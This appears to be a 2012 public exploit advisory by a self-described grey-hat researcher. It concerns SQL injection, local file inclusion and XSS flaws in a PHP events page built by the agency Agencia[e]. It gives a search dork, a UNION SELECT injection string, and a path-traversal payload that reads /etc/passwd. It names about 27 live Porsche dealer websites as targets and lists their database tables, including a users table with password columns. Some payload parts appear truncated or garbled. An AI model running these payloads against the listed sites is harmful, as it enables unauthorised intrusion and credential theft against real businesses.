-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_4n1@live.com # Line: GreyHat # Exploit Title: Agencia[e] - SQL Injection / LFI / XSS Vulnerabilities # Dork: intext: inurl:eventos_mas.php?ideve= # Date: 16/11/2012 # Author: Ur0b0r0x # Url Vendor: http://www.agenciae.tv/ # Vendor Name: Agencia[e] # Tested On: Backtrack R3 / Linux Mint # Type: php # Info: Offical Center Porsche In Spain ------------------- Agreement -------------------- [12/11/2012] - Vulnerability discovered [15/11/2012] - Vendor notified Dont responsed [16/11/2012] - Public disclosure -------------------------------------------------- # Expl0it/P0c ################### http://site.com/eventos_mas.php?ideve= < Sql Vulnerability Path > http://site.com/eventos_mas.php?ideve= < LFi Vulnerability Path > http://site.com/eventos_mas.php?ideve= < XSS Vulnerability Path > # Exploit/Comand/Sql=> +union+select+1,2,3,4--+ # Exploit/Comand/Xss=> "> # Exploit/Comand/Lfi=> /../../../../../../../etc/passwd%00/../../../ # Payload/Comand/Sql=> table_schema=00x5E6536C65716672756732423423 / table_name=0x44F6277C616670x5E6536C65756546269 # Demo_Xss_Sql_Vulnerabilities http://www.porsche-valencia.com/eventos_mas.php?ideve=14' http://www.porsche-madridoeste.com/eventos_mas.php?ideve=201' http://www.porsche-barcelona.com/eventos_mas.php?ideve=237' http://www.porsche-alicante.com/eventos_mas.php?ideve=184' http://www.porsche-pamplona.com/eventos_mas.php?ideve=351' http://www.porsche-bilbao.com/eventos_mas.php?ideve=353' http://www.porsche-ibercarrera.com/eventos_mas.php?ideve=356' http://www.porsche-zaragoza.com/eventos_mas.php?ideve=105' http://www.porsche-murcia.com/eventos_mas.php?ideve=474' http://www.porsche-malaga.com/eventos_mas.php?ideve=436' http://www.porsche-castellon.com/eventos_mas.php?ideve=291' http://www.porsche-marbella.com/eventos_mas.php?ideve=160' http://www.porsche-canarias.com/eventos_mas.php?ideve=182' http://www.porsche-madridnorte.com/eventos_mas.php?ideve=175' http://porsche-baleares.com/eventos_mas.php?ideve=73' http://porsche-asturias.com/eventos_mas.php?ideve=418' http://www.porsche-sevilla.com/eventos_mas.php?ideve=443' http://www.porsche-acoruna.com/eventos_mas.php?ideve=424' http://www.centrosporsche.com/centros/eventos_mas.php?ideve=51' http://porsche-valladolid.com/eventos_mas.php?ideve=59' http://www.porsche-pamplona.com/eventos_mas.php?ideve=53' http://www.porsche-ibercarrera.com/eventos_mas.php?ideve=288' http://www.porsche-tenerife.com/eventos_mas.php?ideve=9' http://www.porsche-braga.com/eventos_mas.php?ideve=243' http://www.porsche-faro.com/eventos_mas.php?ideve=314' http://www.porsche-lisboa.com/eventos_mas.php?ideve=219' http://www.porsche-leiria.com/eventos_mas.php?ideve=220' # The Same Tables And Columns All Site Vulnerability +----------+ | control | | eventos | | noticias | | usuarios | +----------+ +---------+ | Column | +---------+ | alias | | id | | nombre | | pwd | | sid | | url | | usuario | +---------+